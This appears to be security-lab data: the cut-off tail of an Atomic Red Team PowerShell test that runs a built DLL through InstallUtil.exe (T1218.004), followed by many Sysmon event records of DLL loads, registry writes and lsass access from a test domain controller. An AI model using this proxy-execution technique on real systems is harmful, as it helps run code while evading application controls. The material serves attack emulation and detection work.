Invoke-BuildAndInvokeInstallUtilAssembly . C:\AtomicRedTeam\atomics\T1218.004\src\InstallUtilTestHarness.ps1 $InstallerAssemblyDir = \""$Env:TEMP\\"" $InstallerAssemblyFileName = \""T1218.004.dll\"" $InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName $CommandLine = \""/logfile= /logtoconsole=false /U `\""$InstallerAssemblyFullPath`\""\"" $ExpectedOutput = 'Constructor_Uninstall_' $TestArgs = @{ OutputAssemblyDirectory = $InstallerAssemblyDir OutputAssemblyFileName = $InstallerAssemblyFileName InvocationMethod = 'Executable' CommandLine = $CommandLine } $ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs if ($ActualOutput -ne $ExpectedOutput) { throw @\"" InstallUtil Uninstall method execution test failure. Installer assembly execution output did not match the expected output. Expected: $ExpectedOutput Actual: $ActualOutput \""@ }} 534500x800000000000000057599406Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:28:58.000{8B6011A9-A459-618E-BEFC-04000000F101}352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe 534500x800000000000000057600156Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.233{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe 734700x800000000000000057600155Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.233{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runteb92aa12#\8a6f1fd5072bb947ca74e50ce391a3d3\System.Runtime.Serialization.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.Runtime.Serialization.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Runtime.Serialization.dllMD5=D2D5D6F2005BB57034DBE003EE9D14A0,SHA256=53E2A4CB20464A9CDCE924F9513882F3DA575DBE10B68C9437EA37C074AEA798false-Unavailable 734700x800000000000000057600154Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.233{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057600153Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.233{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057600152Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.233{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000057600151Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.233{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057600150Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.218{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057600149Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.218{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 734700x800000000000000057600148Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.218{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\e1c9eb2e855d26a67dbf39e6236430de\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=695EB4BE24FC9DB279F2427D31AD35D4,SHA256=014EDA5BD7025A6F01BEA1F6E05663FE4BCE64FA95B7378EBF9C827991B32E64false-Unavailable 734700x800000000000000057600147Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.218{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\5b778442ed2d60a5de14f752a124bf1a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=9EAA59368783AFE4107F28B6ED8AB1E6,SHA256=BBAC50983BA9B2EDA9CBA8FD0F1DCABF71D24D736A973BA164AF6917A3FC2E7Ffalse-Unavailable 734700x800000000000000057600146Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.218{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\625a7ccd665c33cee4988e3cd136b902\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=27741782AAECFE54A201896D93BA1C9A,SHA256=7389517EE682897300DE398245D2C3EE37E5060CF6320138430A8AA86E6E737Bfalse-Unavailable 734700x800000000000000057600145Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.218{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057600144Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.218{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057600143Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.218{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057600142Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.202{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057600141Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.202{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 13241300x800000000000000057600140Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:29:02.202{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057600139Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:29:02.202{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057600138Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:29:02.202{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057600137Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:29:02.202{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057600136Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.202{8B6011A9-886B-6164-0B00-00000000F101}648812C:\Windows\system32\lsass.exe{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057600135Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.202{8B6011A9-886B-6164-0B00-00000000F101}648812C:\Windows\system32\lsass.exe{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057600134Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.202{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 12241200x800000000000000057600133Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 17:29:02.202{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057600132Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.202{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057600131Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.202{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057600130Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.202{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057600129Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.202{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057600128Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.202{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 734700x800000000000000057600127Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.186{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 734700x800000000000000057600126Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.186{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 734700x800000000000000057600125Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.186{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 734700x800000000000000057600124Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.171{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057600123Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.171{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 734700x800000000000000057600122Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.155{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=1AF6CD8B7CE4A852F67AA98C71AA1D26,SHA256=EF0DE008500A8C9C7908383AF11AE55845EBBE28C96C013EA720950BA89D3D28trueMicrosoft WindowsValid 734700x800000000000000057600121Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.155{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 734700x800000000000000057600120Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.155{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 13241300x800000000000000057600119Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:29:02.155{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7ea-0xc8c783ed) 734700x800000000000000057600117Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.155{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 734700x800000000000000057600116Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.155{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057600115Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.155{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057600114Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.155{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057600113Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.140{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057600112Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.140{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057600111Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.140{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057600110Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.140{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 